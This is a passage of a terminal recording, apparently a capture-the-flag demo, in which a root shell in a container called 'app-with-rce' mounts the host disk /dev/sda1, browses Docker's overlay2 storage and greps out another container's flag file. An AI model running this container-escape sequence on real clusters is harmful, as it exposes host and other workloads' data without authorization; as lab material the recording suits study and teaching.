|\r\n+-----------+---------------------------------------------+---------------------------------------------+\r\n### USERID "]
[114.06964, "o", "###\r\n+--------+----------+---------+-----------+---------+\r\n| USERID | USERNAME | GROUPID | GROUPNAME | HOMEDIR |\r\n+--------+----------+---------+-----------+---------+\r\n| 0      | root     | 0       | root      | /root   |\r\n+--------+----------+---------+-----------+---------+\r\n### VERSION ###\r\n:\u001b[K"]
[114.862471, "o", "\r\u001b[K+---------+----------------------+-------------+-----------+\r\n| VERSION |       BUILDDATE      |   PLATFORM  | GOVERSION |\r\n+---------+----------------------+-------------+-----------+\r\n| v1.22.1 | 2021-08-19T15:39:34Z | linux/amd64 | go1.16.7  |\r\n+---------+----------------------+-------------+-----------+\r\n\u001b[7m(END)\u001b[27m\u001b[K"]
[116.504974, "o", "\r\u001b[K\u001b[?1l\u001b>\u001b[?1049l\u001b[23;0;0t"]
[116.507611, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# \u001b[K"]
[118.311013, "o", "d"]
[118.477933, "o", "f"]
[118.610065, "o", " -"]
[118.904989, "o", "h"]
[119.106292, "o", "\r\n"]
[119.11392, "o", "Filesystem      Size  Used Avail Use% Mounted on\r\noverlay         3.5G  1.9G  1.4G  57% /\r\ntmpfs            64M     0   64M   0% /dev\r\ntmpfs           993M     0  993M   0% /sys/fs/cgroup\r\n/dev/sda1       3.5G  1.9G  1.4G  57% /etc/hosts\r\nshm              64M     0   64M   0% /dev/shm\r\ntmpfs           2.0G   12K  2.0G   1% /run/secrets/kubernetes.io/serviceaccount\r\n"]
[119.117558, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[119.64339, "o", "m"]
[119.830165, "o", "o"]
[119.903273, "o", "u"]
[120.031963, "o", "t"]
[120.075058, "o", "n"]
[120.460117, "o", "\b \b"]
[120.609238, "o", "\b \b"]
[120.776288, "o", "n"]
[120.836378, "o", "t"]
[120.937059, "o", " "]
[121.157089, "o", "/"]
[121.261191, "o", "d"]
[121.337241, "o", "e"]
[121.472162, "o", "v"]
[121.636449, "o", "/"]
[121.813895, "o", "s"]
[123.838098, "o", "d"]
[123.956742, "o", "a"]
[124.333869, "o", "1"]
[124.648015, "o", " "]
[124.802737, "o", "/"]
[125.011985, "o", "m"]
[125.169448, "o", "n"]
[125.272658, "o", "t"]
[125.505108, "o", "\r\n"]
[125.529464, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[125.953853, "o", "c"]
[126.003798, "o", "d"]
[126.065853, "o", " "]
[126.228109, "o", "/"]
[126.406739, "o", "m"]
[126.572983, "o", "n"]
[126.656631, "o", "t"]
[126.751444, "o", "\r\n"]
[126.752164, "o", "\u001b]0;root@app-with-rce: /mnt\u0007root@app-with-rce:/mnt# "]
[126.964474, "o", "l"]
[127.021314, "o", "s"]
[127.142363, "o", "\r\n"]
[127.156074, "o", "\u001b[0m\u001b[01;34mdata\u001b[0m  \u001b[01;34mhostpath-provisioner\u001b[0m  \u001b[01;34mhostpath_pv\u001b[0m  \u001b[01;34mlost+found\u001b[0m  \u001b[01;34mvar\u001b[0m\r\n"]
[127.158056, "o", "\u001b]0;root@app-with-rce: /mnt\u0007root@app-with-rce:/mnt# "]
[127.964205, "o", "c"]
[128.047335, "o", "d"]
[128.140351, "o", " "]
[128.284554, "o", "v"]
[128.388336, "o", "a"]
[128.56105, "o", "r"]
[129.17917, "o", "/"]
[129.43024, "o", "\u0007"]
[129.770133, "o", "\r\nlib/ log/ tmp/ \r\n\u001b]0;root@app-with-rce: /mnt\u0007root@app-with-rce:/mnt# cd var/"]
[130.575377, "o", "l"]
[130.769019, "o", "i"]
[130.827713, "o", "b/"]
[131.109664, "o", "\u0007"]
[131.52505, "o", "\r\nboot2docker/ buildkit/    cni/         containerd/  containers/  docker/      kubelet/     minikube/    minishift/   toolbox/     \r\n\u001b]0;root@app-with-rce: /mnt\u0007root@app-with-rce:/mnt# cd var/lib/"]
[131.953945, "o", "d"]
[132.089696, "o", "o"]
[132.181691, "o", "cker/"]
[132.951493, "o", "\u0007"]
[133.144894, "o", "\r\n"]
[133.151821, "o", "buildkit/   containerd/ containers/ image/      network/    overlay2/   plugins/    runtimes/   swarm/      tmp/        trust/      volumes/    "]
[133.153351, "o", "\r\n\u001b]0;root@app-with-rce: /mnt\u0007root@app-with-rce:/mnt# cd var/lib/docker/"]
[133.688638, "o", "o"]
[134.111358, "o", "\b \b"]
[134.286592, "o", "\r\n\u001b]0;root@app-with-rce: /mnt/var/lib/docker\u0007root@app-with-rce:/mnt/var/lib/docker# "]
[134.661043, "o", "l"]
[134.735226, "o", "s"]
[134.853589, "o", "\r\n\u001b[0m\u001b[01;34mbuildkit\u001b[0m  \u001b[01;34mcontainerd\u001b[0m  \u001b[01;34mcontainers\u001b[0m  \u001b[01;34mimage\u001b[0m  \u001b[01;34mnetwork\u001b[0m  \u001b[01;34moverlay2\u001b[0m  \u001b[01;34mplugins\u001b[0m  \u001b[01;34mruntimes\u001b[0m  \u001b[01;34mswarm\u001b[0m  \u001b[01;34mtmp\u001b[0m  \u001b[01;34mtrust\u001b[0m  \u001b[01;34mvolumes\u001b[0m\r\n\u001b]0;root@app-with-rce: /mnt/var/lib/docker\u0007root@app-with-rce:/mnt/var/lib/docker# "]
[136.256122, "o", "gr"]
[136.308653, "o", "e"]
[136.877528, "o", "p"]
[136.997406, "o", " "]
[137.133249, "o", "-"]
[137.349987, "o", "n"]
[137.44491, "o", "r"]
[137.600936, "o", " "]
[138.266829, "o", "q"]
[138.399335, "o", "u"]
[138.584081, "o", "a"]
[138.664772, "o", "r"]
[139.251055, "o", "f"]
[139.734054, "o", "\b \b"]
[139.861748, "o", "k"]
[140.00437, "o", "s"]
[140.157353, "o", "f"]
[140.247261, "o", "l"]
[140.382091, "o", "a"]
[140.435175, "o", "g"]
[140.584737, "o", " "]
[140.884706, "o", "o"]
[140.948984, "o", "v"]
[141.003083, "o", "e"]
[141.168962, "o", "rlay2/"]
[141.652088, "o", "\r\n"]
[145.491449, "o", "\u001b[35m\u001b[Koverlay2/6a222575a588c475ebe3c693cc6df18c966f015791e964a8254595b135839f88/diff/tmp/super_secr3t.secured\u001b[m\u001b[K\u001b[36m\u001b[K:\u001b[m\u001b[K\u001b[32m\u001b[K1\u001b[m\u001b[K\u001b[36m\u001b[K:\u001b[m\u001b[K\u001b[01;31m\u001b[Kquarksflag\u001b[m\u001b[K{rn3T9mwV2IKePWtETLTpMQ}\r\n"]
[148.573098, "o", "\u001b]0;root@app-with-rce: /mnt/var/lib/docker\u0007root@app-with-rce:/mnt/var/lib/docker# "]
[150.920093, "o", "e"]
[151.118535, "o", "x"]
[151.236744, "o", "i"]
[151.369853, "o", "t"]
[151.505651, "o", "\r\nlogout\r\n"]
[151.523047, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                                                    \r \r"]
[151.546605, "o", "\u001b[0m\u001b[49m\u001b[39m\u001b[K\r\n"]
[151.549752, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m  \u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/Documents/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mkubernetes-rootkit\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mctf-custom\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m \u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;76m \u001b[38;5;76m master \u001b[38;5;178m!5 \u001b[38;5;39m?8\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[127C\u001b[0m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m✔\u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5"]
[151.549901, "o", ";238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m\u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;248m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;248m 2m 29s\u001b[0m\u001b[38;5;248m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;248m \u001b[0m\u001b[38;5;248m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;248m \u001b[0m\u001b[38;5;248m\u001b[48;5;238m\u001b[49m\u001b[39m\u001b[142D\u001b[?1h\u001b="]
[151.550371, "o", "\u001b[?2004h"]
[152.048915, "o", "\u001b[?2004l\r\r\n"]
